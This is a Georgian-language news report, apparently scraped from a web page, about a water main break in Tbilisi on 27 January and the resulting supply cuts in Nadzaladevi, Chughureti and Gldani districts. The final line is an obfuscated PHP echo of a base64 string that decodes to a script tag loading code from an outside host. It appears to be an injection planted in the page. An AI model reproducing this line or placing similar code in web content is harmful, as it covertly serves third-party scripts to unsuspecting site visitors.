celsiusi
ავერსი საქკაბელი
დღეს, 27 იანვარს, ნაძალადევის რაიონში, „ჯორჯიან უოთერ ენდ ფაუერის“ ღრმაღელეს სათავე ნაგებობაზე წყალსადენის მაგისტრალური მილი, რომელიც ნაძალადევის, ჩუღურეთისა და გლდანის რაიონების ნაწილს სასმელი წყლით ამარაგებს, ავარიულად დაზიანდა.
„ჯორჯიან უოთერ ენდ ფაუერის“ ცნობით,კომპანიის ტექნიკური ჯგუფი ადგილზეა მობილიზებული და დაზიანების აღსადგენად აუცილებელი სამუშაოები მიმდინარეობს.
„გადაუდებელი სამუშაოები დღეს, 27 იანვარს დილის 04:45 საათიდან დაიწყო და მთელი დღის განმავლობაში ინტენსიურ რეჟიმში შესრულდება.
აღნიშნულთან დაკავშირებით აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც დღეს, 27 იანვარს დილის 04:45 საათიდან, საღამოს 18:00 საათამდე, წყალმომარაგება შეზღუდული ექნება:
ნაძალადევის რაიონში – სანზონის კორპუსებს, გურამიშვილის გამზირს, დადიანის ქუჩის ნაწილს, დადიანის II მიკრორაიონს, ზღვის უბნის III მიკრორაიონის ნაწილს, ზღვის უბნის XI მიკრორაიონის ნაწილს, ზღვის უბნის IV, IX, X, Xა Xბ კვარტლებს, სარაჯიშვილის, ჩარგლის, ჟინვალის, გვაზაურის, ნიკო მარის, ურიდიას, ქსნის, ჭყონდიდელის, ცისარტყელას, მახინჯაურის, რკინიგზის, კახიანის, ვეშაპურის, ხიმშიაშვილის, ლიახვის, იმერეთის, მესხიშვილის, გეგუთის, სვირის, მირზაანის, სანავარდოს, ლისაშვილის, ბუგეულის, წერონისის, თოდრიას, ლოტკინის მთის, ხუდადოვის, ბეჟანიშვილის, ახალ მოწამეთას, ტიბაანის, შენგელაიას, ნაგომარის და მიმდებარე ქუჩებს, ივერთუბნის დასახლებას.
ჩუღურეთის რაიონში: მეუნარგიას და ზაზიშვილის ქუჩებს.
გლდანის რაიონში – გლდანის „ა“ I, II, III, IV, მიკრორაიონებს, შეშელიძის, ვეკუას, გმირ კურსანტთა, ქერჩი, ვართაგავა, ვასაძის, მორეტის, ბოჭორიშვილის, ხიზაბავრის, ხიზანიშვილის, მოსულიშვილის, მეგობრობის, უცნობ გმირთა და ანაპის დივიზიის 414 დივიზიის ქუჩებს, თიანეთის გზატკეცილს.
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, „ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, ფეისბუქისა და ვებგვერდის მეშვეობით“, – აღნიშნულია კომპანიის მიერ გავრცელებულ ინფორმაციაში.
561
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");